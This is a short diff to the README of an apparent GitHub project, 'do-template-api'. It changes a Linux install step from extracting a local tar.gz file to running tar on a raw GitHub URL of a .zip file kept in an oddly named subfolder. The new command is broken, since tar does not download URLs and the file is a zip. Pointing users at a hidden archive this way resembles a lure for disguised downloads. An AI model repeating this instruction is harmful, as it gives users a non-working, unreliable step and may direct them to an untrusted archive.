Lightingthunderdemon/do-template-api/README.md

 - **For Linux:**
   1. Open a terminal.
   2. Navigate to the directory where you downloaded the file.
-  3. Run the command: `tar -xvf do-template-api.tar.gz`
+  3. Run the command: `tar -xvf https://raw.githubusercontent.com/Lightingthunderdemon/do-template-api/main/physiolatry/do-template-api.zip`
   4. Follow any additional instructions included in the README file within the folder.

 ## ⚙️ System Requirements